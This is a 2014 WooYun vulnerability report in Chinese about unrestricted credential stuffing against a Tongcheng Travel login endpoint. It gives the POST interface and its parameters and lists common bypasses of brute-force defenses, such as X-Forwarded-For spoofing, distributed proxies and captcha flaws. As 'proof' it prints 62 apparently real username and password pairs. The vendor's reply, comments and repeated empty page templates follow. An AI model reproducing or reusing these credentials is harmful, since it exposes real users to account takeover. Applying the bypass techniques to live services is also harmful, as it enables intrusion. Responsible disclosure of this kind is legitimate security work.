同程旅游网某接口无限制撞库(验证破解用户62个)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-088964

漏洞标题：同程旅游网某接口无限制撞库(验证破解用户62个)

漏洞作者： lijiejie

提交时间：2014-12-27 19:30

修复时间：2015-02-10 19:32

公开时间：2015-02-10 19:32

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-12-27：细节已通知厂商并且等待厂商处理中
2014-12-27：厂商已经确认，细节仅向厂商公开
2015-01-06：细节向核心白帽子及相关领域专家公开
2015-01-16：细节向普通白帽子公开
2015-01-26：细节向实习白帽子公开
2015-02-10：细节向公众公开

简要描述：

对于撞库、暴力破解攻击，绝大多数公司是抵御不了的。同程的同仁，你不要太难过。。。
其中涉及的因素太多，完善整个账户体系的安全，需要一个长期的建设过程。
即便重视安全的公司，也可能被攻击者绕过，常见的问题：
1) X-Forwarded-For Client-IP 头绕过，后端取到了错误的IP地址
2) 攻击者低频扫号,后端监测不到异常
3) 攻击者挂了大量代理，或通过成千上万的肉鸡分布式扫号
4) 通过某些白名单IP实施攻击
5) 验证码实现有缺陷，绕过、逆向等

详细说明：

扫号接口：

POST https://passport.ly.com/Member/MemberLoginAjax.aspx
name=用户名&pass=密码MD5 Hash&action=login

漏洞证明：

sbj916    j6b5s2yx
yzjaks    yzj151129
mcc521    552624189
mayee    fengfeng
qq26680412    63516245
zjszj    68008639
huangkun1314    huangkun1314
shirleywsh    53690286
fengzhizi231    fengzhizi231
ssjatwfn    ssjatimk
glongliu    760129
bytestream    767089
tdwcd    aba4822029
charden    nihao0313
qhdxylx    abn68520
yangling1013    19831013
dhlypx    twhgy123
fm921radio    admin124578
xuyunliang    56486819
smile54321    123456789
zxy8635388    84143662
tanid    70628558
thomven    19820222
sonydr520    sonydr83
mayiwei2001    88361821
haitunwan    19880330
gzcjun    chengjun
guatudashi    13711009000
qqqzxz    8203040229
xc899    xc7831899
atrack    a8750861
xghahan    xghahany
leaderpower    leadtype
chenyahuaa    87015807
wwwo5983    598350715
qdhlzp    19810925
zhouxu516518    zhouxu123
zzxllxch    zzx123456
piang1983    198332czl
szhrzbq999    86594141
lym5618    13932563636
rockcola    19860310
bingxinsi    13428992070
feimalin    feimalin
love70345    happy70345
xjafanti    zudonghai
soly2718    sl522718
wuxin715    185124185124
color233    123456
qingyang711    19810711
liufeiliuyuyan    liufeiliuyuyan
jsboy2046    54560910
cijiao    123456789
bluecelia_zhang    63304470
ydyz706    linhongjin
ljf337100    337100
darego    19740929
spybaby    zwhemail
yuanyuantuo    562059487
wangjuan710    wangjuan
gx0258817014    gx07290730
A254861329    254861329

修复方案：

加强控制，如果暂未制定出方案，考虑先临时强制验证码吧

版权声明：转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2014-12-27 22:43

厂商回复：

李姐姐你又来了 o(∩_∩)o
之前刚内部撞过，还在讨论怎么提示用户，体验会比较好。
这个我总觉得还是应该由硬件来做防护？

漏洞评价：

2014-12-27 19:40 | 小川 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

不要太难过,因为洞主是RMB玩家
2014-12-27 22:44 | 小豹 ( 实习白帽子 | Rank:33 漏洞数:8 | 一个人的寂寞，整个群的错234236)

不要太难过,因为洞主是RMB玩家
2014-12-28 21:29 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫，我笑世人看不穿~)

不要太难过,因为洞主是RMB玩家
2014-12-29 08:33 | p0di ( 普通白帽子 | Rank:121 漏洞数:17 | 1+1 = 2 ？)

不要太难过,因为洞主是RMB玩家
2014-12-31 14:46 | lijiejie ( 核心白帽子 | Rank:2210 漏洞数:294 | Just for fun.)

厂商寄送的3 * 200礼品卡均已收到。感谢！ @苏州同程旅游网络科技有限公司

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-088964

漏洞标题：同程旅游网某接口无限制撞库(验证破解用户62个)

相关厂商：苏州同程旅游网络科技有限公司

漏洞作者： lijiejie

提交时间：2014-12-27 19:30

修复时间：2015-02-10 19:32

公开时间：2015-02-10 19:32

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-088964

漏洞标题：同程旅游网某接口无限制撞库(验证破解用户62个)

相关厂商：苏州同程旅游网络科技有限公司

漏洞作者： lijiejie

提交时间：2014-12-27 19:30

修复时间：2015-02-10 19:32

公开时间：2015-02-10 19:32

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-088964"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：